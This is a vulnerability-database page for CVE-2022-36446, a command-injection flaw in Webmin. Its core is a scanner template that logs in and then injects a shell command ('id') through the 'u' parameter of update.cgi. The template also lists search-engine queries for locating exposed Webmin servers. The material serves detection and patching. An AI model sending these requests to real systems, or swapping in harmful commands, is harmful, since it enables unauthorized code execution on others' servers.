| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| Webmin 1.996 - Remote Code Execution (Authenticated) Exploit | 1 Aug 202200:00 | – | zdt | |
| Exploit for Improper Encoding or Escaping of Output in Webmin | 11 Aug 202211:47 | – | githubexploit | |
| Exploit for Improper Encoding or Escaping of Output in Webmin | 9 Sep 202210:34 | – | githubexploit | |
| CVE-2022-36446 | 25 Jul 202206:15 | – | attackerkb | |
| The vulnerability of the software component apt-lib.pl in the Webmin hosting control panel allows a hacker to execute arbitrary code. | 12 Aug 202200:00 | – | bdu_fstec | |
| CVE-2022-36446 | 25 Jul 202212:32 | – | circl | |
| Webmin 安全漏洞 | 25 Jul 202200:00 | – | cnnvd | |
| Webmin Command Injection (CVE-2020-35606; CVE-2022-36446) | 20 Jan 202100:00 | – | checkpoint_advisories | |
| CVE-2022-36446 | 25 Jul 202205:56 | – | cve | |
| CVE-2022-36446 | 25 Jul 202205:56 | – | cvelist |
id: CVE-2022-36446
info:
name: Webmin <1.997 - Authenticated Remote Code Execution
author: gy741
severity: critical
description: |
Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.
remediation: |
Upgrade Webmin to version 1.997 or later to mitigate this vulnerability.
reference:
- https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
- https://www.exploit-db.com/exploits/50998
- https://github.com/webmin/webmin/compare/1.996...1.997
- https://nvd.nist.gov/vuln/detail/CVE-2022-36446
- http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-36446
cwe-id: CWE-116
epss-score: 0.96049
epss-percentile: 0.99867
cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: webmin
product: webmin
shodan-query:
- title:"Webmin"
- http.title:"webmin"
fofa-query: title="webmin"
google-query: intitle:"webmin"
tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb,vuln
http:
- raw:
- |
POST /session_login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}
- |
POST /package-updates/update.cgi HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1
mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{randstr}}'
- 'uid'
- 'gid'
- 'groups'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221008057c4ef50f270b0f0e66be61533f2280f5ff79c62faf8b9c9379b762e1714f902203ef4d1b195eb528e5c7fa3c20ff895d479905e47aa64ffe9161b7de886a1530b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation